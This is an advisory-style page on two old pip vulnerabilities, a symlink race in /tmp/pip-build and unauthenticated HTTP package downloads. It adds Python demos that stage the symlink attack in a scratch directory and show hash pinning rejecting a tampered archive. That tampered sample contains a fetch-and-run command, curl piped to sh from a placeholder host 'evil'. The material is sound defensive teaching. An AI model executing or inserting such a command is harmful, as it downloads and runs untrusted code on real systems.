CVE-2013-1888
https://notcve.org/view.php?id=CVE-2013-1888
pip before 1.3 allows local users to overwrite arbitrary files via a symlink attack on a file in the /tmp/pip-build temporary directory.

The build directory had a fixed, predictable name under the world-writable /tmp, so a local attacker could pre-create it and plant a symbolic link at the name of a file pip was about to write; when pip unpacked the package it followed the link and overwrote the link target with pip's own privileges (root, when installing into the system site-packages). The general remedy is a per-run build directory with an unpredictable name and restrictive mode, and opens that refuse to follow a pre-existing link.

References:
http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105952.html
http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105989.html
http://lists.fedoraproject.org/pipermail/package-announce/2013-May/106311.html
http://www.openwall.com/lists/oss-security/2013/03/22/10
https://github.com/pypa/pip/issues/725
https://github.com/pypa/pip/pull/734/files
https://github.com/pypa/pip/pull/780/files

CWE-59: Improper Link Resolution Before File Access ('Link Following')
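The following is an added illustration of the attack class and its mitigation, not code from pip or from the advisory. It stages the scenario in a scratch directory standing in for /tmp: the attacker pre-creates the predictable build directory and plants a symlink named setup.py pointing at a victim file; the vulnerable pattern (a fixed path opened with plain open()) follows the link, while the hardened pattern (a private mkdtemp directory plus O_CREAT|O_EXCL|O_NOFOLLOW) refuses a planted link and never writes outside its own directory. All file names and contents are constructed for the demo.

```python
import os
import tempfile


def unsafe_write(build_root, name, data):
    """Vulnerable pattern: predictable path under a shared directory,
    opened with open(), which silently follows an attacker's symlink."""
    path = os.path.join(build_root, name)
    with open(path, "w") as f:
        f.write(data)
    return path


def make_build_dir():
    """Hardened step 1: per-run directory with a random name and mode 0700,
    so an attacker cannot pre-create it or place anything inside."""
    return tempfile.mkdtemp(prefix="pip-build-")


def safe_write(build_dir, name, data):
    """Hardened step 2: O_CREAT|O_EXCL fails if *anything* already exists at
    the path (a symlink included), and O_NOFOLLOW (where available) refuses
    to traverse a link at the final component. Raises FileExistsError when
    a planted entry is found instead of writing through it."""
    path = os.path.join(build_dir, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
    if hasattr(os, "O_NOFOLLOW"):
        flags |= os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Run both patterns against a pre-planted symlink; return what happened."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:  # stands in for /tmp (constructed)
        victim = os.path.join(tmp, "victim.txt")
        with open(victim, "w") as f:
            f.write("original")

        # Attacker: create the predictable build dir and plant the link.
        planted_root = os.path.join(tmp, "pip-build")
        os.mkdir(planted_root)
        os.symlink(victim, os.path.join(planted_root, "setup.py"))

        # Vulnerable installer writes "setup.py" ... into the victim file.
        unsafe_write(planted_root, "setup.py", "clobbered")
        with open(victim) as f:
            results["victim_after_unsafe"] = f.read()

        # Restore and retry with the hardened open in the planted directory:
        # O_EXCL sees the existing symlink and refuses.
        with open(victim, "w") as f:
            f.write("original")
        try:
            safe_write(planted_root, "setup.py", "clobbered")
            results["safe_refused_planted_link"] = False
        except FileExistsError:
            results["safe_refused_planted_link"] = True

        # Hardened installer in its own private directory: write succeeds
        # there, victim is untouched.
        build_dir = make_build_dir()
        try:
            written = safe_write(build_dir, "setup.py", "build file")
            results["safe_path_inside_private_dir"] = written.startswith(build_dir)
        finally:
            for entry in os.listdir(build_dir):
                os.unlink(os.path.join(build_dir, entry))
            os.rmdir(build_dir)
        with open(victim) as f:
            results["victim_after_safe"] = f.read()
    return results


if __name__ == "__main__":
    print(demo())
```

The two hardening steps are independent: the random, 0700 directory removes the attacker's ability to pre-plant anything, and O_EXCL|O_NOFOLLOW makes the write fail closed even if a shared directory is ever reused. Note that O_EXCL rejects an existing symlink regardless of whether its target exists, so a dangling link planted ahead of time is also caught.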
CVE-2013-1629
https://notcve.org/view.php?id=CVE-2013-1629
pip before 1.3 uses HTTP to retrieve packages from the PyPI repository, and does not perform integrity checks on package contents, which allows man-in-the-middle attackers to execute arbitrary code via a crafted response to a "pip install" operation.

Plain HTTP gives no authentication of the server or the response, and with no hash or signature check on the downloaded archive an attacker on the network path can substitute a package of their choosing; because pip runs the package's setup.py during installation, the substituted archive executes with the installing user's privileges. pip 1.3 moved PyPI access to HTTPS with certificate verification (see the changelog reference below); independently of transport security, pinning the expected digest of each archive lets the client reject a tampered download.

References:
http://www.pip-installer.org/en/latest/installing.html
http://www.pip-installer.org/en/latest/news.html#changelog
http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a
https://bugzilla.redhat.com/show_bug.cgi?id=968059
https://github.com/pypa/pip/issues/425
https://github.com/pypa/pip/pull/791/files

CWE-20: Improper Input Validation
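The following is an added example, written for this entry and not taken from pip, of the integrity check that was missing: the expected digest of each archive is pinned out-of-band (the format used is the `--hash=algo:digest` requirement syntax of later pip releases, assumed here only as a convenient notation) and every fetched archive is compared against it before anything is unpacked or executed. The archive bytes, the pinned line and the tampered variant are constructed for the demo; the `install` helper is hypothetical and stands in for the step that would otherwise run setup.py.

```python
import hashlib
import hmac


class HashMismatch(Exception):
    """Raised when a downloaded archive does not match its pinned digest."""


# Constructed stand-in for an sdist as served by the index.
GOOD_SDIST = b"\x1f\x8b example-1.0.tar.gz (constructed payload bytes)"
# What an on-path attacker substituted in the HTTP response.
TAMPERED_SDIST = GOOD_SDIST + b"\n# setup.py: os.system('curl http://evil/x | sh')"

# Pinned requirement line, as it would live in a requirements file.
PINNED_LINE = "example==1.0 --hash=sha256:" + hashlib.sha256(GOOD_SDIST).hexdigest()


def parse_requirement_line(line):
    """Split 'name==ver --hash=algo:digest ...' into (spec, {algo: digest}).

    Several --hash options for one requirement are all recorded; a download
    must satisfy every one of them.
    """
    parts = line.split()
    spec, pinned = parts[0], {}
    for opt in parts[1:]:
        if not opt.startswith("--hash="):
            raise ValueError("unsupported option in requirement line: %r" % opt)
        algo, _, digest = opt[len("--hash="):].partition(":")
        if algo not in hashlib.algorithms_available or not digest:
            raise ValueError("malformed hash option: %r" % opt)
        pinned[algo.lower()] = digest.lower()
    return spec, pinned


def verify_download(data, pinned):
    """Check the archive bytes against every pinned digest.

    Returns True only if all digests match; raises HashMismatch otherwise.
    An empty pin set is refused rather than treated as 'anything goes',
    which is exactly the failure mode of an installer with no check at all.
    """
    if not pinned:
        raise ValueError("no pinned hash for this download; refusing to trust it")
    for algo, expected in pinned.items():
        actual = hashlib.new(algo, data).hexdigest()
        # Constant-time compare: the digest is public, but the habit is cheap.
        if not hmac.compare_digest(actual, expected):
            raise HashMismatch("%s mismatch: expected %s, got %s" % (algo, expected, actual))
    return True


def install(requirement_line, fetched_bytes):
    """Hypothetical install step: verify first, only then 'run setup.py'.

    Returns the spec that was installed; raises before any code from the
    archive would run if the bytes do not match the pin.
    """
    spec, pinned = parse_requirement_line(requirement_line)
    verify_download(fetched_bytes, pinned)
    return spec  # the unpack-and-build step would follow here


if __name__ == "__main__":
    print("installed:", install(PINNED_LINE, GOOD_SDIST))
    try:
        install(PINNED_LINE, TAMPERED_SDIST)
    except HashMismatch as e:
        print("rejected:", e)
```

The check is transport-independent: it catches a substituted archive whether it arrived over HTTP, over a TLS connection to a compromised mirror, or from a local cache. What it does not do is tell you the pin itself is right; the digest has to come from a source the attacker cannot rewrite, such as a requirements file committed alongside the code rather than the same index page the archive was fetched from.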